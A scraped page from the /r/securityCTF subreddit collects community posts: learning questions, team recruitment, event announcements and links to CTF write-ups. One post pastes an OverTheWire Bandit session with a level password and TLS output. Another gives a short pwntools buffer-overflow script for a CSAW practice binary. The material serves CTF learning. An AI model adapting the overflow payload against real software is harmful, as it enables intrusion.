/r/securityCTF
A community for securityCTF announcements and writeups.
Join us on IRC (freenode):
Looking for a team ?
CTF Streamers:
CTF teams:
Related Subreddits:
Tools:
/r/securityCTF
hello everyone , so i'm new to the field of binary exploitation and i'm bit lost of how to approach it .there are a lot of resources out there but i can't seem to decide . someone recommended nightmare .is it any good and is it enough to learn all the basics or i need to keep looking for more after its completion
I need help in hard challenge df please
bandit16@bandit:/tmp/random_sshkey$ cat /etc/bandit_pass/bandit16
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
bandit16@bandit:/tmp/random_sshkey$ openssl s_client --connect localhost:31790
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = SnakeOil
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = SnakeOil
verify return:1
Certificate chain
0 s:CN = SnakeOil
i:CN = SnakeOil
a:PKEY: rsaEncryption, 4096 (bit); sigalg: RSA-SHA256
v:NotBefore: Jun 10 03:59:50 2024 GMT; NotAfter: Jun 8 03:59:50 2034 GMT
Server certificate
-----BEGIN CERTIFICATE-----
MIIFBzCCAu+gAwIBAgIUBLz7DBxA0IfojaL/WaJzE6Sbz7cwDQYJKoZIhvcNAQEL
BQAwEzERMA8GA1UEAwwIU25ha2VPaWwwHhcNMjQwNjEwMDM1OTUwWhcNMzQwNjA4
MDM1OTUwWjATMREwDwYDVQQDDAhTbmFrZU9pbDCCAiIwDQYJKoZIhvcNAQEBBQAD
ggIPADCCAgoCggIBANI+P5QXm9Bj21FIPsQqbqZRb5XmSZZJYaam7EIJ16Fxedf+
jXAv4d/FVqiEM4BuSNsNMeBMx2Gq0lAfN33h+RMTjRoMb8yBsZsC063MLfXCk4p+
09gtGP7BS6Iy5XdmfY/fPHvA3JDEScdlDDmd6Lsbdwhv93Q8M6POVO9sv4HuS4t/
jEjr+NhE+Bjr/wDbyg7GL71BP1WPZpQnRE4OzoSrt5+bZVLvODWUFwinB0fLaGRk
GmI0r5EUOUd7HpYyoIQbiNlePGfPpHRKnmdXTTEZEoxeWWAaM1VhPGqfrB/Pnca+
vAJX7iBOb3kHinmfVOScsG/YAUR94wSELeY+UlEWJaELVUntrJ5HeRDiTChiVQ++
wnnjNbepaW6shopybUF3XXfhIb4NvwLWpvoKFXVtcVjlOujF0snVvpE+MRT0wacy
tHtjZs7Ao7GYxDz6H8AdBLKJW67uQon37a4MI260ADFMS+2vEAbNSFP+f6ii5mrB
18cY64ZaF6oU8bjGK7BArDx56bRc3WFyuBIGWAFHEuB948BcshXY7baf5jjzPmgz
mq1zdRthQB31MOM2ii6vuTkheAvKfFf+llH4M9SnES4NSF2hj9NnHga9V08wfhYc
x0W6qu+S8HUdVF+V23yTvUNgz4Q+UoGs4sHSDEsIBFqNvInnpUmtNgcR2L5PAgMB
AAGjUzBRMB0GA1UdDgQWBBTPo8kfze4P9EgxNuyk7+xDGFtAYzAfBgNVHSMEGDAW
gBTPo8kfze4P9EgxNuyk7+xDGFtAYzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3
DQEBCwUAA4ICAQAKHomtmcGqyiLnhziLe97Mq2+Sul5QgYVwfx/KYOXxv2T8ZmcR
Ae9XFhZT4jsAOUDK1OXx9aZgDGJHJLNEVTe9zWv1ONFfNxEBxQgP7hhmDBWdtj6d
taqEW/Jp06X+08BtnYK9NZsvDg2YRcvOHConeMjwvEL7tQK0m+GVyQfLYg6jnrhx
egH+abucTKxabFcWSE+Vk0uJYMqcbXvB4WNKz9vj4V5Hn7/DN4xIjFko+nREw6Oa
/AUFjNnO/FPjap+d68H1LdzMH3PSs+yjGid+6Zx9FCnt9qZydW13Miqg3nDnODXw
+Z682mQFjVlGPCA5ZOQbyMKY4tNazG2n8qy2famQT3+jF8Lb6a4NGbnpeWnLMkIu
jWLWIkA9MlbdNXuajiPNVyYIK9gdoBzbfaKwoOfSsLxEqlf8rio1GGcEV5Hlz5S2
txwI0xdW9MWeGWoiLbZSbRJH4TIBFFtoBG0LoEJi0C+UPwS8CDngJB4TyrZqEld3
rH87W+Et1t/Nepoc/Eoaux9PFp5VPXP+qwQGmhir/hv7OsgBhrkYuhkjxZ8+1uk7
tUWC/XM0mpLoxsq6vVl3AJaJe1ivdA9xLytsuG4iv02Juc593HXYR8yOpow0Eq2T
U5EyeuFg5RXYwAPi7ykw1PW7zAPL4MlonEVz+QXOSx6eyhimp1VZC11SCg==
-----END CERTIFICATE-----
subject=CN = SnakeOil
issuer=CN = SnakeOil
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
SSL handshake has read 2103 bytes and written 373 bytes
Verification error: self-signed certificate
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 4096 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: B72700C4C308174C497E5D6212606BFEABFCE923AAA437D4999A60D41ADCDFE6
Session-ID-ctx:
Resumption PSK: C0DB379469A2B5D670C5C0F8E95DAA56F2E26FE74097CC9BC2E491F6C46C431749DDCEA80B9CF79B1A57DF77BE9D800A
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 17 1f c7 90 ef 1a 4b fd-e6 3b 76 df 12 a7 62 21 ......K..;v...b!
0010 - 36 1c 00 ab 87 16 6a 9f-5f 24 18 c7 ef d8 ba e5 6.....j._$......
0020 - 7b 21 f6 64 04 b6 b3 15-88 e3 53 aa 6a 91 22 97 {!.d......S.j.".
0030 - b2 b8 96 83 48 21 b3 52-c1 9b cf 45 cf 84 bc d2 ....H!.R...E....
0040 - 74 82 be ce 3c f6 22 48-fb 81 ef f4 70 7c 9a ce t...<."H....p|..
0050 - f7 aa 0b 53 68 d0 13 ce-e1 8a 64 11 29 32 a4 86 ...Sh.....d.)2..
0060 - df 72 3b d2 b9 cc 6c c2-0d e8 2f 62 17 44 07 19 .r;...l.../b.D..
0070 - 4e 86 02 86 77 5d b4 23-41 2d 69 44 52 fd 28 b3 N...w].#A-iDR.(.
0080 - 91 bc e7 4d fe bb 54 21-80 b6 8c 99 5c e1 f8 a4 ...M..T!....\...
0090 - 0b 68 ab 5b bd 0b 6b b7-59 3d 08 e6 2b af bd 96 .h.[..k.Y=..+...
00a0 - e8 7e 7f d0 c3 b6 6f 85-72 3e dc 7c 1a c6 29 9c .~....o.r>.|..).
00b0 - b0 cb 63 6d b0 13 62 9c-6e f9 bc 91 81 60 0f 25 ..cm..b.n....`.%
00c0 - 82 c9 9b 07 40 23 43 29-2f 7c fe 21 fa fe ce 04 ....@#C)/|.!....
00d0 - c9 a2 a4 02 f3 03 43 6a-b9 70 a2 d5 c6 1d b9 ce ......Cj.p......
Start Time: 1719239474
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
read R BLOCK
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 063CA87F7F9189A62CAE43DE02350F43516EF9C353A0E95998D96CACEB885E3F
Session-ID-ctx:
Resumption PSK: 94789D3CE3D04299707E06DD32D9C6E89CF0D62F97F14212017481D8B245B10ECDAF6E98FB10EDBA0FFBD3A6F5CBB57E
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 17 1f c7 90 ef 1a 4b fd-e6 3b 76 df 12 a7 62 21 ......K..;v...b!
0010 - 0a dd 25 06 c1 33 fe c8-f6 d4 6b 48 71 ca d4 66 ..%..3....kHq..f
0020 - 26 8a 00 2b 88 1f 65 e2-19 98 ba 8c 7d 41 77 25 &..+..e.....}Aw%
0030 - aa 80 7e 93 97 7d 32 78-43 e1 42 6f 18 ec 8d fe ..~..}2xC.Bo....
0040 - 8f ac c6 7f 24 11 26 48-89 13 ac a6 b4 b6 f3 19 ....$.&H........
0050 - 7c 42 8e 09 a0 68 09 8e-36 4a 2d 1d 58 cb 75 3b |B...h..6J-.X.u;
0060 - b8 a9 e4 7c 8f 92 f8 25-d0 69 9a c3 d8 87 7f f0 ...|...%.i......
0070 - 78 5f 0c 4b 74 89 1b f5-ab 5a 57 b9 07 cf 5f 52 x_.Kt....ZW..._R
0080 - 20 f7 96 81 42 6f 6c f5-18 ae f0 20 2a d2 43 6a ...Bol.... *.Cj
0090 - e2 35 bd ea c9 5c d7 8a-0c cb 53 ec 8d e6 74 24 .5...\....S...t$
00a0 - dd 67 bf 76 84 6c 15 a2-a1 77 64 94 11 0b 6f 0c .g.v.l...wd...o.
00b0 - af 68 49 2f 26 65 4d 39-fe f6 a2 fd 6f 72 a0 b2 .hI/&eM9....or..
00c0 - f9 98 8c 71 fc 79 58 b0-87 25 71 13 c1 8d cd 25 ...q.yX..%q....%
00d0 - 22 ef 27 0a 9f 34 19 e6-40 aa 02 25 b7 4d df ee ".'..4..@..%.M..
Start Time: 1719239474
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
read R BLOCK
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
KEYUPDATE
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-23 15:51 GTB Daylight Time
Nmap scan report for 192.168.1.141
Host is up (0.016s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
i tryed everything possible. ^_^ or how to make filtrered. ( the smb is opened from windows installed).
I am looking for CTFs to practice my weakest areas in infosec, I found one limited CTF for Car hacking which is great. And there are so many CTFs and archives but I haven't really seen much to practice those areas. any tips would be welcome (I am working through microcoruption which I guess is probably the closest to biohacking(at least medical devices ) and IoT )
Since past few days, I was reading some research paper on how to take advantage of ret2libc library and working on some CTFs. Checkout some of the ROP Emporium and HTB write ups that I come up with.
ROP Emporium ret2win CTF Writeup - https://vandanpathak.com/kernels-and-buffers/return-oriented-programming-ret2win-rop-emporium/
ROP Emporium split CTF Writeup - https://vandanpathak.com/kernels-and-buffers/return-oriented-programming-split-rop-emporium/
ROP Emporium callme CTF Writeup - https://vandanpathak.com/kernels-and-buffers/return-oriented-programming-callme-rop-emporium/
ROP Emporium write4 CTF Writeup - https://vandanpathak.com/kernels-and-buffers/rop-challenge-write4-rop-emporium/
HTB October.cms & ret2libc CTF Writeup - https://vandanpathak.com/htb-writeups/october-htb-ret2libc-writeup/
I would definitely appreciate any feedback from the community on it and looking for any new buffer overflow CTFs challenges.
Hi everyone as title suggests, looking for members to participate in upcoming CTF events! Namely Google and OSINT
Currently a one man and looking to expand! All levels are welcomed :)
Are you passionate about web application testing and bug bounty hunting?
We're building a community of like-minded hackers who are ready to put in the work and learn together. Join us on our Discord server where we:
Targeting intermediate users with a basic knowledge of the OWASP Top 10, this server aims to attract dedicated individuals who are serious about web application testing and bug bounty hunting.
Prerequisites: Basic knowledge of the OWASP Top 10, and experience with Hack The Box machines and PortSwigger labs.
link :Β https://discord.gg/VnXA2uJa
we are looking for an intermediate-advanced web player to play with us for googlectf. weβre currently ranked 40th globally on ctftime. dm me on discord @rev4184 if anyone is interested
I am a beginner and I am always doing CTFs alone but I feel more motivated working as a team. I am interested in the aspects of pwn and reverse, and I hope to find some friends to study togetherοΌ
I read a writeup for this challenge after I couldn't solve it for many days, and the exploit used there is not longer valid. So, is it still exploitable?
Hello,
so I was trying out nightmare, and tried out the challenge warmup from CSAW 2016.
It's a simple Ret2win challenge but my solution doesn't seem to work even though it equivalent to the write-up.
Here's my solution
from pwn import *
Β io=process("./warmup")
payload=b'A'*(72)
payload+=p64(0x40060d)
io.sendlineafter(b'>',payload)
io.interactive()
Could it be something about my environment since I'm solving the challenge locally. Or is my solution flat-out wrong.
Have a nice day.
The hint given is: "I lost my cat somewhere near this place. I can give you some hints of my cat. It does meow meow, it likes 1 when i net cl1p her nails. My kitty gets me βdead birdsβ. Please find my cat."
And this image provided with it is attached.
I reverse image searched but couldn't find anything. I think "dead birds" refers to Tweets, so something on Twitter. The metadata for the PNG file doesn't have anything interesting, I'm thinking of trying XXD for getting its Hex data but not sure how to go about that. Also, the "net Clip" could be like a URL shorter? Any ideas?
Hello everyone, im fairly new to CTF done NCL/HTB CTF pretty decent at OSINT and somewhat logs, trying to get better at pentest. Mainly looking for people to learn and grow with while doing CTF for fun.
I am pretty new to cyber security and ethical hacking. One of my friends suggested me to participate in a CTF organized in the southern part of the nation. The first round will be offline.
The team requirements is 2 members and I'm pretty new for the entire thing. If anyone can be my team mate and help me / guide me during the thing, it would be really grateful. The competition is based in India.
Hi all, so I was suggested to run a demo for our staff which involves technical and non technical people and some are senior staff members. I have given social engineering demos before. But I want to do something more engaging something around phishing and social engineering but involve the staff into a challenge that will be fun and a learning experience for them. So I was thinking explaining some techniques first and then giving them a CTF challenge to solve. Any suggestions or new ideas are welcome. Thanks.
The first blood times on HTB blow my mind, sometimes for easy web challenges someone has found the flag in the time in takes me to only just figure out what the challenge is about.
Are you experienced people just awesome or are you using a bunch of custom automation stuff? Are there any public repos to help with faster solving that you can recommend?
I did some research and saw something from John Hammond and I also saw AutoRecon, but I think both of these tools might be quite noisy or at least designed to information gather rather than solve. Any insights appreciated. Thanks.
We are excited to invite students to our thrilling Capture The Flag (CTF) event, in collaboration with IIT-Bombay Trust Lab and Team YCF.
π Event Details:
π Prizes:
π Register here: https://unstop.com/hackathons/capture-the-flag-rv-college-of-engineering-1001756
π Highlights:
Get ready to Decode, Dominate, and Defend! Showcase your skills, learn from the best, and win fantastic prizes.
π Important Dates:
Don't miss this chance to compete at a national level!
For more info, visit: https://ctfrvcexiitbevnt.netlify.app
We look forward to seeing your students shine!
Warm Regards,
Coding Club RVCE
Im an IT engineer student.. I just learned shell commands and assembly language.. I'm looking forward to learn about CTf. So what free courses do u suggest? And websites to practice and compete? Thank you in advance
In this latest article, I am sharing a very detailed and comprehensive walkthrough of HTB Business CTF 2024's Fullpwn challenge "Submerged". A step-by-step write-up on how to approach this boot2root challenge, recon, research vulnerabilities, exploit and perform post-exploitation on a Linux server running a vulnerable CMS web application (SPIP 4).
HTB Business CTF 2024 β Submerged (Fullpwn)β Write-up
A Very Detailed Walkthrough of the HTB Business CTF 2024 Submerged Challenge
https://cybersecmaverick.medium.com/htb-business-ctf-2024-submerged-fullpwn-write-up-6fb5be96540d
This blog post attempts to be a definitive guide for Cross Site Scripting. Let me know your opinion.
Cross Site Script Vulnerability β Definitive Guide β The Code Journey
If anyone comes up with different way to exploit the XSS, we shall add them up on our blog with due credits.
The Cross Site Scripting is being demonstrated on DVWA.
Happy Reading!